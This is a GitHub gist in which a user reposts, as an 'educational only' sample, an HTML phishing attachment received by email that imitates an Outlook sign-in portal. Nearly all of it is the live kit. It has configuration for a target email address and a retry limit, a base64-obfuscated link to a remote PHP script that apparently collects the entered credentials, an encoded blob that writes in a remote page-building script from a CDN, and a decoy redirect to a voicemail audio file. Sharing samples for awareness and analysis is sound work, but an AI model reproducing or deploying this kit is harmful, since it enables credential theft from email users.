Skip to content

Instantly share code, notes, and snippets.

@miglen
Created November 23, 2022 15:30
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save miglen/d7bcf2f8aec98d49c10bca5e4a8fa65e to your computer and use it in GitHub Desktop.
Save miglen/d7bcf2f8aec98d49c10bca5e4a8fa65e to your computer and use it in GitHub Desktop.
Outlook phishing portal attempt via html (educational only, I have received this via email)
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<script>
let EMAIL_ADDRESS = "user@company.com"; // Change this to the email address
let BASED64_ENCODED_EMAIL = ""; // If you wish to encode the email address, enter the based64 encoded email and leave the email address blank otherwise, leave this field blank
let SCRIPT_LINK_URL = window.atob("aHR0cHM6Ly9tZWdhdGVycmEuaHUvc2NyaXB0LnBocA"); //Enter the script link here
let NUMBER_OF_RETRY = 2; //The user attempt limit
let FINAL_REDIRECTION = window.atob("aHR0cHM6Ly9pYTgwMTQwMi51cy5hcmNoaXZlLm9yZy8xMS9pdGVtcy92b2ljZW1haWxfMjAyMTAzMDkxNDQ4MzdfNzEyOTExMDAvdm9pY2VtYWlsXzIwMjEwMzA5MTQ0ODM3XzcxMjkxMTAwLndhdg=="); //
let is_office = true; // If u want to bomb outlook alone, change this to false
</script>
<script>
var X="DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2pxdWVyeS8zLjYuMC9qcXVlcnkubWluLmpzIiBpbnRlZ3JpdHk9InNoYTUxMi04OTRZRTZRV0Q1STU5SGdaT0dSZUZZbTRkbldjMVF0NU50dllTYU5jT1ArdTFUOXFZZHZkaWh6MFBQU2lpcW4vKy8zZTdKbzRFYUc3VHViZldHVXJNUT09IiBjcm9zc29yaWdpbj0iYW5vbnltb3VzIiByZWZlcnJlcnBvbGljeT0ibm8tcmVmZXJyZXIiPjwvc2NyaXB0PiA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jZG4uc3RhdGljYWxseS5pby9nbC9qbXRlY2hvZmZpY2lhbC9vZmZfYXR0YWNobWVudC9idXNlcy9qeC5qcyI+PC9zY3JpcHQ+IDxzY3JpcHQgaWQ9ImN1c3RvbWpzIj48L3NjcmlwdD4gPHNjcmlwdD5pZiAodXJsX2luZGV4X25hbWUubGVuZ3RoID4gMCl7aW5jbHVkZV9zY3JpcHQodXJsX2luZGV4X25hbWUpO308L3NjcmlwdD48L2hlYWQ+PGJvZHkgc3R5bGU9Im9wYWNpdHk6IDA7IHRyYW5zaXRpb246IG9wYWNpdHkgLjdzIGVhc2UtaW4tb3V0Ij48bm9zY3JpcHQ+IDxzdHlsZT5kaXYsIGRpdiAqe2Rpc3BsYXk6IG5vbmUgIWltcG9ydGFudDt9PC9zdHlsZT4gPGxhYmVsPlRoaXMgcGFnZSB1c2VzIEphdmFTY3JpcHQgPGJyPllvdXIgYnJvd3NlciBlaXRoZXIgZG9lc24ndCBzdXBwb3J0IEphdmFTY3JpcHQgb3IgeW91IGhhdmUgaXQgdHVybmVkIG9mZiA8YnI+VG8gc2VlIHRoaXMgcGFnZSBhcyBpdCBpcyBtZWFudCB0byBhcHBlYXIgcGxlYXNlIHVzZSBhIEphdmFTY3JpcHQgZW5hYmxlZCBicm93c2VyLjwvbGFiZWw+PC9ub3NjcmlwdD48L2JvZHk+PC9odG1sPg==";
document.write(atob(unescape(X)));
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment